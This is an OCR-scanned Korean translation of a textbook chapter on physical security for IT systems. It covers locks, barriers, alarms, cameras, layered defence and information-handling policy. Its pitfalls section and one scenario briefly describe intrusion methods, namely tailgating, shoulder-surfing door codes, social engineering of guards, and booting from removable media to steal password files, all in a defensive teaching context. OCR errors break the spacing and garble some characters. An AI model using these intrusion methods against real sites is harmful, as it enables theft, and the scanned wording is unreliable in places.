못받는다고 하자. 이 런 경 우 한 종업 원이 가만히 숨어 들어 와서 그 기 계를 뒤문으로 내 
가는데 이때 뒤문에 감시카메라가 있어서 앞으로 직업을 잃고 감방에 갇혀 있는 기간에 
5, 000딸라가 소요될것 갈으면 훔치는 노릇이 수지 맞지 않게 된다. 여기서 억제요소는 
회 사가 아니 라 그 종업 원에 게 값을 치 르게 한다는것 을 명 심하라. 그런데 흔히 물리보안 
전문가들은 소유자에게만 돈이 드는것으로 잘못 생각하는 경향이 있다. 보호원가 대 재해 
복구/교체원가사이의 관계 를 분석하는 위험분석때 에는 보호대상에 대 한 소유자의 투자값 
이 필요하다. 5, 000딸라짜리 기계를 지키려고 10, 000딸라를 들이려는 사람은 없을것이 
다. 그러나 억제라는 원칙에서는 범죄자들의 능력 대 비용의 관계 즉 범죄자자신이 내적 
으로 진행하는 위험평가에 대하여서도 반드시 고려에 넣어야 한다. 이경우 1만딸라짜리 
감시카메라체계대신 300딸라짜리 비감시카메라를 뒤문에 설치해도 충분할것이다. 

여 기서 난점 은 계 층적방어 가 어 느 부분이 범위 와 심도이고 어 느 부분이 억제인가를 
결정하는것 이 다. 그렇기때 문에 매 계 층이 탐지，억제 혹은 지 연에 어 느 정도로 기 여하는 
가를 세밀히 분석하여 한 위험요소의 동기와 능력도 계산해 보아야 한다. 이러한 통합적 
인 대 안은 수지 를 맞추는 과정 으로서 분석 적 위 험 관리라고 부론다. 
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물리적보안기술 


보안구성요소 

관건장치 물리적보안통제수단들은 대체로 관건장치로 구성된다. 기능상으로 보면 낮 
시 간접 근자물쇠，근무시 간외 자물쇠，비 상출구자물쇠 가 있 다. 낮시 간자물쇠 는 번호판이 나 
카드읽 기 장치 와 갈은것 으로서 해 당 인원들의 출입 을 위 한것 이 다. 근무시 간외 자물쇠 는 자 
주 열거나 채우게 되여 있지 않으며 보다 견고하다. 비상출구자물쇠는 한 방향으로의 움 
직 임(즉 화재 대 피시 사용)에 만 쓰고 다른 방향으로는 가기 힘 들게 되 여 있다. 

류형상으로 보면 관건장치들은 기계적인것도 있고 전자적인것도 있다. 기계적관건장 
치들은 전기를 쓰지 않는다. 일상적으로 쓰는 대부분의 관건장치들은 기계적인것들이다. 
전기 적 관건장치 는 유도선륜이 라고 하는 잠금장치 를 움직 이 는데 전기 를 쓴다. 유도선륜은 
철심둘레에 코일을 감은것이다. 철심은 코일에 전류를 통과시키면 안팎으로 움직이게 되 
여 있다. 다른 전기쇠형식은 커다란 전자석을 리용하여 문을 닫아 매는것이다. 이것의 좋 
은점은 움직 이는 부분은 거의 없이 문을 잡는 힘 이 매우 센것이다. 

사람들이 관건장치의 인증 ( IT 용어를 사용한다면)을 받는 방법은 날이 감에 따라 더 
욱 더 복잡해 지 고 있 다. 전통적 으로 사람들은 일 반열쇠 나 기 계열쇠 를 썼 다. 지 금은 번호 
판을 돌려 내부극소형처리기와 회로에 전원을 투입하여 여는 번호관건장치들도 있다. 또 
한 전자수자관，콤퓨터，생체계측값，카드열쇠로 사람들을 식별하는 방법들도 있다. 이것 
들이 IT 보안전문가들에게는 보다 익숙된 .분야로 되지만 쥐여 짜면 결국에는 다 같은 관 
건장치 이 다. 총체적 으로 문관건장치와 결합된 인증체계를《출입문조종체계》라고 한다. 

장벽 장벽에는 바람벽，울타리，출입문，문주，정문이 포함된다. 장벽설계에는 실로 
놀랄만한 량의 기술과 사유가 필요하다. 장벽설계의 계산에는 폭탄폭발과 화재견딤성，폭 
력적 용가능성 이 다 들어 간다. 장벽설 치 에서 고려해 야 할 문제 점 들에 는 바닥충진과 바람 
견딤성이며 미 학적측면도 역 시 고려해 야 한다. 수많은 선택사항들을 맞추자면 다음의 문 
제 즉《 장벽 이 누구 혹은 무엇 을 저 지 하기 위한것 이 며 얼 마동안 필 요한가》라는 문제 에 
대 답이 주어 져 야 한다. 

이에 대한 답을 주자면 장벽을 하나의 접근조종요소로 보아야 한다. 사무실에 들어 
가는 문이 아니 라 사무실 에 들어 가는 사람 또는 사물을 통제 하기 위한것 이 바로 이 장 
벽 인것 이 다. 예 비본레 프와 갈은 귀 중한 자료들이 사무실 에 있는가，하드웨 어 도난과 갈은 
것을 방지하자는것인가，예상되는 도적이 회사사원인가，침입이 가능한 장소가 작은 사무 
실들인가，그 사무실 이 목재 건물이 여서 화재 에 의한 자료손실 이 기 본위 험 으로 되 고 있는 
곳인가 만약 그렇다면 화재는 접근 못하도록 얼마나 견제될수 있는가(즉 소방대대응소요 
시간은 얼마인가) 등에 대한 질문이 제기되고 그 해답들이 나와야 한다. 

경보장치 장벽 과 관건장치 들은 접 근조종을 직 접 실 현 한다. 그러 나 경 보는 그러한 통 
제수단들이 제대로 작용하는가 즉 접근조종이 위반되였는가를 알려 주는것이 일차적목적 
으로 되고 있다. 경보는 대개 사람이 어떤 행동을 취해야 한다는것을 알려 주는것이다. 
화재 경 보는 물살포기 를 자동적 으로 투입하면서 도 소방대 에 의한 사람의 대 응도 촉구해 
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준다. 계층적방어의 관점에서 보면 경보기가 있음으로 하여 억제력이 추가된것이나 같다. 
수감부는 침입자의 움직임이나 화재의 열 등 경보조건들을 수감하여 조종체계에 보고하 
면 조종기는 대응을 시작하여 경보종을 울리든가 경 찰에 비상전화를 거는 등의 대응조치 
들을 취한다. 여러 통제장치들을 감시하는 시설을 가리켜 《중앙감시》시설이라고 한다. 

우에서 이야기된것과 같이 수감부들은 흔히 환경조건이나 침입을 탐지한다. 환경적 
조건에는 온도，습도，진동이 있다. 온도수감으로는 화재경보뿐아니라 봉사기방에 있는 
공기조화기의 고장도 알수 있다. 습도수감으로는 비나 수도관이 터져서 생기는 침수를 
알수 있다. 진동수감부는 환경수감부들과 같이 리용하여 중요한 하드웨어들을 보호 할수 
있을뿐아니 라 유리 파손수감부 같은 침 입수감부에도 쓰이며 울타리 에 설치하여 누가 울타 
리에 기여 올라 오는가 하는것도 탐지할수 있다. 기타 침입수감부로는 방안의 초음파나 
열의 변화를 계측하여 사람의 움직임을 탐지할수 있다. 사실상 침입수감부들의 대부분은 
인간활동에 맞게 설정된 환경수감부들에 지나지 않는다. 따라서 전기를 끄지 않은 커피 
끓이개나 실내선풍기들과 갈은 제품들도 허위경보를 울릴수 있다. 

출입문들에는 자석스위치들이 설치되여 있어 감시가 진행된다. 문에는 자석을 설치 
하고 얇은 철띠들로 만들어 진 스위치가 문틀에 설치된다. 문이 닫기면 자석이 철띠와 
맞불어 문을 곡 닫게 해주어 회로가 구성된다(열면 회로가 끊어 진다). 

울타리주변감시는 마이크로파나 적외선광속으로 하는데 이 광속은 사람이 들어 오면 
끊기면서 경보가 울리게 되 여 있다. 케블을 지면에 묻어 두고 사람들이 지 나 가는것을 람 
지한다. 동물들이 지 나 가면 이 주변감시장치들이 오유경보를 울리군 한다. 

이 수많은 경보체계에서 중요한 특징은 유선이나 무선으로 어떻게 수감장치들과 조 
종체 계 에 련결시 키 는가 하는것 이 다. 무선체 계 들은 설 치 하기 쉬 우나 라지 오과장애 나 인위 
적 인 전파장애의 영향을 받을수 있다. 유선체계들은 비용이 많이 들거나 설치하기가 힘 
들지만 도관에 묻는 경우는 매우 안전하다. 유선이든 무선이든 조종장치가 그 체계들의 
무결성을 감시하게 되면 더 좋다. 수감부들에 조작스위치들을 달고《선로감시》를 통하 
여 통신선결선상태를 확인할수 있으면 더욱 좋다. 

경보에서의 기본문제는 경보장치가 누구와 무엇을 람지하게 되여 있는가，대응행동 
은 무엇인가이다. 여기서 《누구》인가에 의하여 경보체계의 정교화가 결정된다면 《무 
엇》인가에 따라 수감장치들의 예민도가 결정될수 있다. 이것들이 결정되면 경보전문가 
는 수감부들을 적 당히 섞 어 배 치 할수 있을것 이 다. 

경보조종기가 기본적으로 하는 일은 수감기들에서 들어 오는 정보에 따라 경보체계 
들을 가동시키거나 끄는 일이다. 이러한 주요한 기능을 가지고 있기때문에 그것을 끄자 
면 그러한 사람의 권한을 인증할수 있는 수단이 있어야 한다. 앞에서 언급된것처럼 이런 
인증을 하는 방법은 본질상 통과암호로부터 시작하여 스마트카드，생체계측정보에 이르 
기까지 임의의 정보체계의 인증방법과 곡갈으며 모두가 우단점이 다 있다. 

조명과 카에라 조명과 카메라를 결합하는것은 본질상 곡갈은 기능 즉 사람이 보게 
끔 하자는것과 관련된다. 더우기 조명은 카메라에 있어서 없어서는 안될 요소이다. 빛이 
너무 세거나 너무 약하면 자동차처럼 큰것도 볼수 없게 된다. 카메라조명을 적당히 하는 
것은 쉬운 문제 이지만 높은 보안조건에서 는 조명기재제 작업체와 카메 라제 작업체 에 자료 
를 의뢰하여 받을수 있다. 일반적으로 카메라가 침입자를 탐지할수 있다고 잘못 생각할 



수 있다. 카메라도 람지할 가능성은 있다. 억제력의 견지에서는 조명과 카메라가 있으면 
침입자가 로출될수 있는 위험성은 높아 진다. 위험도가 낮은 경우에는 이것이면 충분하 
다. 그러 나 위험도나 위험요소가 증가되면 그것만으로는 안심 할수 없다. 경 비 원의 주의 가 
딴데로 집중되면 사고가 누구도 모르게 일어 난다. 의심이 되는 경우에는 출입자신호장 
치가 없는 출입문의 밖에 카메라를 설치해 보아도 좋다. 자기들이 들어 오는것을 경비원 
이 보지도 못하며 문을 제끽 열어 주지 않는다고 사람들은 불평할것 이 다. 카메 라들은 경 
비원들의 눈(과 귀)의 확장으로서 정황을 평가하는데 가장 적합하다. 

절도방지, 변경방지, 재고통제수단 콤퓨터와 말단장치들에 대한 절도행위가 자료의 
리용성과 비밀성에 직접적영향을 미친다는것은 명백하다. 그러나 제마음대로 그 무엇을 
변경시키는것도 자료의 무결성보장에 장애로 된다. 물리적으로 접근하게 되면 수많은 전 
통적 인 IT 보안조치 들을 다 우회할수 있는 기회 가 있으므로 모뎀，무선망기 판，예 비하드디 
스크를 끼워 통과암호파일을 흉칠수도 있으며 다른 OS 를 기동시 킬수도 있으며 비 법적으 
로 망에 접근할수 있는 등 그 위험은 끝이 없다. 경로기 갈은 보안장치들에 물리적으로 
접 근하여 현지 에 서 망에 접 속하여 설정값들도 고쳐 놓을수 있 다. 

소매 및 도매 기 업 들에 서 는 도난과 변경 을 방지하는 핑장한 수의 제 품들을 내 놓았다. 
변경방지 장치 들 이 접 근을 통제하여 보호자산의 무결 성 을 담보한다면 도난방지 장치 들과 
재 고품통제 장치 들은 제 한지 역 에 로의 움직 임 을 제 한한다. 이 제 품들의 기 술은 지 금까지 
IT 자산보호를 위한 새 로운 제 품들에 투하되 여 왔다. 

도난방지 장치들에 는 관건장치 달린 그물장，서 류함，케 스，케 블，고정 쇠 들이 있 다. 바 
코드 (bar code ) 같은 부표들과 재 고통제 수단들도 도난을 억 제 한다. 보다 정 교한 장치 들로 
는 진동수감기，움직임수감기，전원선감시체계，전자상품감시 ( EAS ) 체계를 들수 있다. 전 
원선감시체계는 누가 콤퓨터나 기타 보호자산의 전원선을 뽑으면 경보가 울리게 되여 있 
는 장치 이 다. EAS 체 계 는 보호자산이 해 당 지 역밖으로 나가면 경 보가 울리 는 장치 이 다. 
가장 널리 알려 진 EAS 장치들은 아마도 소매상점들에서 옷과 같은 기 타 상품들에 달아 
놓은 자그마한 딱지들일것 이 다. 판매원이 그 딱지의 기능을 정지시키지 않으면 상점밖으 
로 그것 을 가지 고 나갈 때 시끄러 운 경 보가 울리 게 된 다. 

조작방지 장치 들로는 관건장치 가 달린 서 류장，관건장치 씌 우개，극소형 스위 치，진동 
및 운동수감부，조작방지나사를 들수 있다. 


물리적보안의 역할 


물리적보안의 기본역할은 필요 없는 사람들을 들여 놓지 않으며 《 내부사람〉〉들을 
언제 나 정 직하게 하는것 이 다. IT 보안의 견지에서는 그 역 할이 그리 다르지 않다. 물론 
《사람》을《사물》로 바꾸어 불，물 등과 갈은것 으로 볼수도 있지 만 기 본사상은 다 같 
다. 가장 큰 차이라면 보호해야 할 재산의 범위가 넓은것이다. 물리적보안에서는 사람， 
종이，재 산 등을 보호해 야 할 뿐아니 라 양식화된 자료들도 보호해 야 한다. 

그러 면 무엇 으로부터 시 작할것 인가. 앞에 서 이 미 언급된 계 층적방어 의 심 도에 대 한 
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해설을 상기해 보자(여기서는 하나의 장벽뒤에 또다른 장벽이 놓여 있다). 교과서에 있는 
분석에 따르면 충분한 심도의 결정은 보안대응시간에 달려 있다고 한다. 물리적보안실천 
가들은 매개 통제수단 혹은 대응책을 하나의 시간지연행동으로 보고 있다. 경비력량이 
동원되는데 걸리는 총시간이 자 최소필요지연시 간인것이다. 물론 물리적보안의 령 역에서 
많이 실천된 사실임에도 불구하고 이 지연전략은 극히 최근에야 IT 보안전략의 하나로 제 
안되였다. 

물리적세계에서의 작용은 다음과 갈다. 가령 해당 지역 경찰로부터의 대응예상시간 
이 10분이라고 하자. 주변 울타리에는 경보장치가 없으므로 단순한 하나의 억제수단으로 
밖에 되지 않는다. 첫 경보기는 앞문에 있는데 앞문통과가 2분 걸리는것 으로 본다. 그러 
면 경찰이 도적을 잡는데는 출입문과 현금사이의 내부계층들에 해당한 8분이 라는 시간이 
걸 린 다. 

정보기술세계에서는 계층화라고 할 때 경로기가 뒤에 있고 대리자 ( proxy ) 가 뒤에 있 
는 방화벽 들이 인차 떠 오른다. 물리적통제 수단들의 뒤 에는 보충적 인 물리적통제 수단들이 
또 있으며 싸이버통제수단들뒤 에 도 더 많은 싸이버통제수단들이 있다. 이것은 본질상 좋 
은것 이 다. 그러 나 자료에 대 한 보안에 서 는 물리 적 통제 장치 들과 싸이버 통제 장치 들의 역 할 
이 서로 보안적 이여야 한다. 이것들이 다학과적 인 방어에서 겹겹 이 놓이는 격 이 다. 

다학과적인 방어 


다학과적인 방어에서는 보안문제를 해결하는데 하나이상의 기술이나 전문지식이 리 
용되 게 된 다. 물리 적 보안에 는 장벽기 술로부터 조작방지 장치 에 이 르기 까지 여 러 가지 학과 
혹은 학문이 포괄되게 된다. 매 학문은 다른 학문에 도움을 준다. 매 요소는 하나의 목적 
을 가지고 다른 요소와의 협동밑에 사용된다. 매개 층에서 요소들사이의 기본관계는 보 
안사건을 방지 하고 람지 하며 분석하려 는 필요성 이 다. 실례 로 경 보접 촉장치 와 카메 라가 
달린 관건장치를 한 문이 있다고 하자. 그 문은 현재 사람들이 들어 가지 못하게 길을 
막는 역할을 한다. 문이 열리면 경보신호가 울려 경비원을 부른다. 경비원은 카메라를 사 
용하여 정 황을 분석하고 해당 대 책 을 세 운다. 예방，탐지，분석 에 여 러가지 기 술들이 집 
합적으로 리용된셈이다. 

좀 더 넓 은 견지 에 서 물리 적보안을 하나의 학문으로，정 보기 술보안도 하나의 학문으 
로 보자. 비 록 서 로 다른 학문이 지 만 이 두가지 를 서 로 분리하여 고찰할수는 없 다. 실 례 
로 로임과가 Windows NT 를 쓰고 있다고 보자. 로임과장은 거기 에 통과암호려과장치 를 
설 치하여 모든 사용자들이 전적 으로 담보되 는 통과암호를 쓰게 끔 하고 있 다. 로임 과장은 
콤퓨터시동을 이동성매체(즉 플로피디스크나 CD - ROM ) 로도 할수 있기때문에 통과암호와 
결국 방까지 위험성이 있다는것을 모르는바 아니다. 플로피디스크로 시동되기만 하면 통 
과암호파일들이 도난 당하거나 파괴 당할수 있다. 수많은 사람들이 회사에서 저녁늦게까 
지 일하며 제품을 생산하는 1층에서는 밤교대까지 있으나 로임과 직원들은 대체로 오후 
4시면(로임지불전날을 제외 하고) 다 퇴근한다. 



한가지 방도는 플로피와 CD - ROM 구동기를 다 떼버리는것 이 다. 그러 나 이 제의는 경 
영진으로부터 그 일 자리 가 당신에 게 귀 중하지 않다면 야… 하는 친절 하나 확고한 경 고에 
부닥친 다. 바이 오스설 정 판에 서 부트기 능을 수정 하고 스위 치 를 설 치 하고 마더보드에 있는 
조작경 보선택 항목을 리용하여 조작방지 용나사를 를퓨터케 스에 바꾸어 채 운다. 이것 은 다 
학과적 인 방법 을 리용하는 하나의 실례 이지 만 의뢰기 들의 수를 고려하면 특히 그 의뢰기 
들을 위한 봉사가 계속 진행 되 는 경 우를 고려하면 추가적 인 일감이 있게 되 므로 그리 만 
족을 느끼지 못하게 된다. 그래서 물리적보안을 더 강구하여 하나의 또 다른 물리적보안 
층을 추가하는것 이 좋다. 로임과 사무실에 있는 출입문에 보안성 이 높은 막대기걸쇠를 하 
나 채운다. 그래도 만족이 될가?! 경비체계가 있으면 경비원들에게 퇴근후 문이 정확히 
닫기 도록 하며 만일 누가 로임 계 산콤퓨터 를 재 시동시키거 나 사용하는 사람이 있으면 다 
기록해 놓으라고 강조하여 일러 둘수 있을것이다. 경비원이 누가 로임과 직원인지 혹은 
담당직원인지 어떻게 안단말인가. 명단을 주면 될것이다. 이러한 보충적인 물리보안세부 
사항들은 대체로 잊고 있는 내용들이다. 

이제 는 반대 의 위 치 에서 고찰해 보자. 새 로운 카드출입체 계(로임 과와의 막후교섭 의 
결과인)에 상당히 만족하여 있는 경비원들과 한담을 하고 있다고 보자. 여러 기밀부서들 
에 들어 가는 사람들에 대한 통제권과 책임권은 그들에게 절대적으로 주어 져 있다. 로 
임 과사람들은 만족하며 로임관계정 보도 안전하다고 본다. 설치만 하면 근심 이 다 사라지 
는 이런 보안상 기발한 착상으로 물리적보안은 상당히 흐뭇하다. 경비원들도 그 수가 줄 
어 들었고 복도로 야간순찰하지 않아도 된다. 이때 한가지 생각이 계속 마음을 피롭힌다. 
이 카드출입체계의 콤퓨터가 어디에 놓여 있는가. 복도밑에 있는 작은 방에서 그 콤퓨터 
가 동작하고 있으며 그것도 Windows NT 를 쓰며 통과암호관리 자구좌도 없이 구좌검 사도 
없이 가동되고 있다는것을 인차 알게 된다. 음，그러니까 콤퓨터귀신이면서도 불평이 많 
은 종업 원이 로임파일들을 어쩌 지 않는다고 아직도 담보할수 있는가?! 건물관리 과에서 
일 하는 이 전 경 비 원은 안전할가. 아마 현재 경 비 원으로 일하는 인원들에 게 일정한 정 보 
기술보안에 대한 방조를 줄 필요가 있다. 

1996년에 채택된 《국가경제정람관계법》을 보면 물리적으로나 전자적으로나 자료를 
보호하는것 이 가지는 중요성 을 재 인식할수 있다. 이 법은 외국정부가 리 익을 보는 경우 
에 무역비밀의 도난이 정탐행위로 된다고 하였다. 그러나《무역비밀》의 정의에는 다음 
과 갈은 내용들이 포함되여 있다. 

그 소유자는 이러한 정보를 비밀에 붙이기 위하여 합리적인 대책들을 취하였다. 그러나 
현재 《 합리적 인 대 책》이 라는 말의 확고한 법적정의 가 없으나 출발점 으로 1997년 워 싱론특 
별시 FBI 본부의 총무부 행정 법률처 처 장인 법 률박사 패트럭 더 블류 켈리는 자기 부문 요원들 
에 게 다음과 갈은 지 침서 를 하달하였 다.《기 업 들에 건의하여 소유자들이 자기의 독점적 인것 
이라고 간주되는 정보나 자료들은 명백히 표식하며 무역비밀이 보관되는 물리적재산들을 보 
호하며 직무상관계 로 알아야 할 필요가 있는 인원에 게만 무역비밀을 제 한하며 회 사의 무역비 
밀의 성 격과 가치 에 대 하여 모든 종업 원들에게 강습을 주기 위한 적 극적 인 대 책 들을 취 하게 
할것이다.》 
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이것은 무역비밀이든 아니든 모든 귀중한 정보를 보호할수 있는 좋은 권고이다. 사 
실 켈리의 권고는 상식적인 보안내용이다. 이 상식적인 내용을 다음과 같이 묶어 볼수 
있다. 즉 식별하라，표식하라，안전하게 하라，추적하라，알고 있으라이 다. 이 분류는 보안 
조종의 실 천적측면을 보여 준다. 물리보안을 위한 공통적 인 실 천사항들을 IT 보안을 위한 
실 천사항들과 함께 아래 에 제 시한다. 

1. 식별하라 

1. 물리적보안 정부는 이것을 분류지침 이 라고 한다. 무엇을 보호해 야 하는가를 
결정하고 제목별 혹은 주도어별로 그것을 어떻게 식별할것인가에 대한 지침 
을 작성하라. 그 지 침만 있으면 신입사원이 내용에 기 초하여 임의의 문건의 
비밀성정도를 판정할수 있게 되여야 한다. 실례로 개발과제의 목적이나 의뢰 
자의 이름을 담은 그 어떤 문건은《회사비밀》로 된다(그 개발과제이름은 기 
밀이 아니다). 

정보기술보안 전자적 인 분류지침을 작성하는것을 제외하고는 물리보안과 같 
다. 제 목과 주도어별 로 그것 을 하이 퍼 링 크하여 사용자가 몇 가지 질 문에 만 대 
답을 주면 그 문건의 비 밀성 과 방책 상 필요사항들을 쉽 게 결정할수 있게 되 
여 야 한다. 

2. 표식하라 

1. 물리 적보안 고무도장이 나 붙임띠 를 리용하여 기 밀문건들을 표식해 두라. 문건 
철은 명백해야 하며(색갈로 혹은 색갈띠로 구분하여) 표식이 있어야 한다. 표 
식딱지에는 특별취급사항，비밀성해제날자，허용접근자 등에 대하여 명백히 
지적되여 있어야 한다. 

U . 정 보기 술보안 기밀 자료에 대 하여서 는 자동문건머 리부/꼬리부나 표지 를 리용하 
라. 인쇄시 자동적 으로 표시 폐 지 가 찍혀 나오게 하라. 

3. 보호하라 

上 물리적보안 위험에 기초하여 물리적방어층을 구축하라. 다음의것들이 매 물리 
적보호들에 대한 가능성들이다. 결코 이것은 누구에게나 이것들이 다 필요하 
다는것이 아니다. 바깥층에서부터 안으로 들어 오는 이 보호층들食 정보기술 
보안실천자들이 반드시 알아야 할 물리보안층을 구성하는 공통적인 선택안들 
이다. 

① 주변 주변접근조종에는 울타리，가시철조망，정문， ID 검열 등과 갈은 물 
리적장벽들이 있다. 주변에서는 경보장치와 카메라도 리용된다. 

② 건물마당 건물마당안에서는 사람들(걸어 다니는 사람과 차를 타고 출입 
하는 사람들)의 출입 을 통제하는 물리 적장벽 들과 함께 카메 라，조명，경 
보장치，순찰경비원 등이 배 치될수 있다. 

③ 건물의 입구 출입문들，관건장치들，빗장을 지른 창문，카메 라，경보기，다 
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른 하나의 ID 검 열탁이 나 카드접 근체 계(많은 호텔들에서 열쇠 대 신 카드를 
리용하여 방에 들어 가듯이)가 있는 시 설 건물이 가까이 에 있 다. 

④ 건물의 매층 건물로 깊이 들어 갈수록 일부 호텔들처럼 승강기에 특별한 

열쇠를 쓰며 계단들에 경보장치가 있는 등 층별로 접근이 더 제한된다. 
계 단층과 복도에는 감시카메 라가 들어 있다. 

⑤ 종합사무실 종합사무실들에 대 한 접근조종수단들에는 출입카드체계，관 
건장치，코드를 입 력하는 번호판，접 수원，쇠출입 문 혹은 강심출입 문이 
있 다. 나무로 만든 문들은 무게 를 적 게 하기 위해 속이 비 였 으므로 열 
기 쉽 고 접 철도 오래 간다. 그러 나 철띠자물쇠 와 같은 관건창치 들을 설 
치 하면 고정 이 든든치 못하므로 인 차 떨 어 져 열릴 수 있 다. 단단한 심 
을 넣 으면 문이 상당히 든든함수 있다. 종합사무실안에 는 개 별적 인 사 
무실 들이 있 으며 거 기 로는 번호판，카드，보통열 쇠 등을 리용하아 틀어 
갈수 있다. 

⑥ 사무실물리보안 사무실에 일 단 들어 가면 관건장치가 있는 서류장，금고， 

금고실，도난/조작방지용기구들，경보체계 등이 있을수 있다. 기밀적인 디 
스크， CD - ROM 들, 기타매체들은 다 장에 넣고 쇠를 채우라. 방화방수보 
관용기면 더 욱 좋다. 서류처 리 기를 리용하라. 

정보기술보안 위험에 기초하여 정보기술방어층을 형성하라. 방화벽，대 리자봉 
사기，경 로기，망주소해 석，교환기，망감시 등을 리용하라. 통과암호와 사용자 
인증을 리용하여 파일 에 대 한 접 근권과 허 용권，항비 루스，자료여벌 복사，자료 
암호화，덧 쓰기 편의프로그람 등을 리용하라. 창문에 서 보이 지 않는 곳에 모니 
터들을 놓으며 비상전원 ( UPS 나 발전기)，예비설비를 두라. 

4. 추적하라 

물리적보안 접근목록(알고 있어야 할 목록)，기대점검목록，재고품명세통제수 
단들，재 정 검 열，등기 우편 및 담보서 한 

정보기술보안 후열，수자식인증서，수자식서명，파일사용허가 등 

5. 알고 있으라 

1. 물리적보안에서나 정보기술보안에서나 사람들이 무엇을 왜 해야 하는가를 잘 
알도록 해야 한다. 보호실행을 위한 방책을 작성하라. 방책에는 필요한 접근 
조종대책들과 취급절차들이 명시되여야 한다. 직무에 따라 책임이 다르므로 
그에 맞게 과제제시와 전습을 달리 적용하라. 

L . 물리보안 취 급절 차에는 복사，우편보내 기，문서 의 기 밀 기 간, 문건페 기 등에 대 
한 요구사항들이 담겨 져야 한다. 

C . 정보기술보안 전자적 인 취 급을 위한 방책들(례하면 복사，절 차，전자우편보내 
기 , Web 싸이 트에 게 시 하기，파일 지 우기 등)이 마련되 여 야 한다. 
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물리적 보안과 정보기술보안방책과의 통합 


앞에서 본 《알고 있으라》부분의 기밀내용들을 만족시키기 위한 방책들이 세워 지 
면 기타 부분의 내용들을 실현할수 있는 필요한 로정도가 형성될수 있다. 매 부분에는 
물리적보안의 실례들과 그에 대응되는 정보기술보안의 실례들도 언급되였다. 따라서 정 
보를 보호하기 위 한 방책 에 는 물리 보안요구사항들뿐아니 라 정 보기 술보안요구사항들이 같 
이 취급되지 않으면 안된다. 수자식형태의 정보는 보호하면서 왜 종이형태의 정보는 보 
호하지 않겠는가. 방책에는 두 내용들이 다 담겨 져야 한다. 방법상 일관성은 있어야 하 
지만 응용에서 언제나 꼭같이 할 필요는 없을것이다. 실례로 개발계획에 대한 비밀정보 
가 안전하게 개발계획동업자들에게 전달되도록 하는 방책이 있다고 하자. 종이문서의 세 
계에서는 밀봉한 봉투에 넣은 문건이면 충분할것이다. 그러나 전자문서의 세계에서는 강 
력한 암호화가 필요하다. 봉투의 문건도 암호화하면 좋지 않은가，물론이다. 배달원이 봉 
투를 뜯어 볼수 없으니까. 그래도 보호상태가 꼭갈지 않단 말이지，원인은 위험성의 규모 
에 있다. 배달원은 누구인가 고정되여 있고 담보도 있으며 만일 길가에 떨구었다 해도 
그것을 주어 읽어 보는 사람은 매우 제한되여 있다. 그러나 인터네트망으로 보내면 누가 
가운데서 접속해 읽어 보는지，복사되는지，다량으로 재배포되다가(그것도 무료로) 마침 
내는 어떤 나쁜놈의 손에 들어 가지나 않는지 도저히 알수 없게 된다. 《안전하게 하 
라》의 부분에서는 물리계나 전자계나 다 갈다. 그러나 각기 실천에서는 개별적인 위험 
요소에 따라 구체적 으로 적용되 여 야 한다. 

방책의 전자적인 측면에서 볼 때 물리적접근조종을 떠나서는 절대로 그 무엇도 불가 
능하다. 실례로 높은 수준의 어느 방책에 이렇게 되여 있다고 하자.《사용자들이 망접근 
권을 취득하자면 고유한 식별을 받아야 한다》. 이로부터 통과암호，통과암호접수，통과 
암호보관의 기준들이 제기되게 된다. 그러나 앞에서 든 어느 한 로임과의 실례에서 본바 
와 같이 높은 수준을 요구하는 방책의 성공은 그 방책에 콤퓨터에 대한 물리적접근의 보 
호를 위 한 기 준들을 포함시 켜 야만 가능한것 이 다. 그러 므로 정 보기 술보안방책 들과 기 준들 
에 물리세계와 전자세계의 두 분야의 접근조종이라는 넓은 문제가 다 포괄되여야 한다. 
이렇게 되여야 심도와 범위가 향상되게 된다. 기준과 방책이 전면적으로 구현되면 넓이 
도 잘 보장된다. 앞에서 본 로임과의 씨나리오에서 콤퓨터망전반에 걸쳐 기준들을 실행 
하였 더 라면 경 보체 계 콤퓨터 도 보호되 였을것 이 다. 

물리적보안의 함정 


물리적보안을 실행함에 있어서 다음과 갈은 일련의 제한성들과 약점들을 고려하여야 
한다. 


1. 사회공학 정 보기 술보안에 서 와 마찬가지 로 사회 공학은 물리 적 보안통제 수단을 교 
묘하게 잘 피한다. 흔히 해당 기관사람처럼 보이면 누구도 그의 신원을 묻지 않는 
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다. 그 사람이 그럴듯한 이야기를 꾸며 내면 경비원도 속히울수 있다. 낮시간접근 
통제용번호자물쇠와 전자카드열쇠체계도 출입을 금지하고 있을 때에는 잘못이 없 
지만 누군가가 속히워 자물쇠번호를 대주어 문이 열리게 할수도 있다. 

2. 번호자물쇠의 약점 통과암호와 갈으므로 사람들은 흔히 자물쇠의 번호를 어디엔 
가 써놓거나 벽 갈은데 불여 놓을수 있다. 번호를 누를 때 어깨너머로 훔쳐 볼수 
도 있다. 

3. 뒤따르기 흔히 쓰는 수법이 뒤따르기하여 시설로 들어 가는것이다. 뒤따르기하려 
면 승인 받은 해당 인원이 署어 갈 때 뒤를 바싹 따라 가면 문이 닫기기전에 같이 
들어 갈수 있다. 흔히 앞서 가는 사람은 뒤사람(즉 뒤따르는 자)을 위해 문을 붙잡 
아 주기까지 할수 있다. 무리 지어 들어 갈 때 따라 들어 가는것은 더욱 쉽 다. 그들 
이 들어 갈 때 바른척 하면서 초조해 하면 먼저 들어 가라고 양보해 줄수도 있다. 

4. 날씨 및 환경조건 날씨가 나쁘고 해가 너무 비치든가 반사가 있든가 안개 끼는 
경우들에는 카메라가 쓸데 없으며 지어 수감부에서 허위경고를 낼수도 있다. 자동 
차시창이 더 러운것처럼 카메 라렌즈에 먼지나 때가 끼면 해를 볼 때와 갈은 산란현 
상이 있게 된다. 고열과 심한 추위도 설비들을 비정상적으로 동작시킬수 있다. 나 
무가지들이 자라나도 동물이나 새들처럼 주위의 경보장치들에 영향을 줄수 있다. 

5. 실내전기제품들 가열되거 나 랭각되는 실내전기제 품들은 움직 임 람지 기 에 영 향을 
주며 허위경보를 울릴수 있다. 따라서 퇴근할 때에는 커피 끓이는 주전자나 가열 
판들의 전기스위치는 다 꺼야 한다. 움직이는 실내전기제품(선풍기 등)이나 설치 
물들(윙윙하는 창문빛가리개)도 더운 방에 찬바람이 불어 들어 올 때처럼 허위경 
보를 울릴수 있다. 랭동기의 압축기가 결함이 있어서 전기적인 잡음이 생기든가 
방열기에서 김 이 새는것과 갈은 음향은 수감부들에 허위판단을 내릴수 있는 가능 
성을 줄수 있다. 

6. 만성적인 태도 장난군들에 의하여 우정 허위경보나 잘못된 경보가 울려 경보체 
계에 대한 신뢰도가 떨어 질수 있다. 실례로 진동수감부를 장치한 울타리를 탕하 
